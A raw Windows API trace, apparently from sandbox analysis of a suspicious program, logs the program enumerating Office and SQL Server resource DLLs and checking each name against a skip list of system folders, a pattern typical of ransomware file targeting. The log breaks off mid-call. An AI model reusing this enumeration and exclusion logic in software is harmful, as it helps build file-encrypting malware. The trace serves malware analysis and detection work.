[0126.550] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.550] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.550] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.550] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.550] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.550] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.550] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.550] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0126.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d800, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d920, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0126.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0126.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0126.551] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2d943c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4f00, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.551] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.551] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.551] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.551] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.551] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.551] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.551] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.551] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.551] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.551] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0126.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d728, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0126.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0126.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0126.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f3a8 [0126.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.551] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1b5bbeb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1b5bbeb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b5bbeb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0126.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dba8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0126.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d920, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23eae8 [0126.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0126.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.552] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf637b042, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf637b042, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf637b042, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19af8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0126.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0126.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d800, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d920, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244ab0 [0126.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0126.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0126.552] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf44563cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf44563cd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf44a2874, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x70ae8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d698, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0126.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0126.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0126.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244ab0 | out: hHeap=0x1e0000) returned 1 [0126.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.553] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfaf7a22a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf7a22a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb43ee0e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MI5C38~1.DLL")) returned 1 [0126.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0126.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20dde8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0126.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0126.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d578, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0126.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0126.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0126.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.553] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1e30870, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1e30870, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf23b4040, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xaad8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0126.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0126.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ecb8 [0126.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0126.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.554] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c62325, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4c62325, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4c62325, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3e78, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0126.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dba8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0126.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d728, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e110 [0126.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0126.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.554] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd09866, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd09866, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0126.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 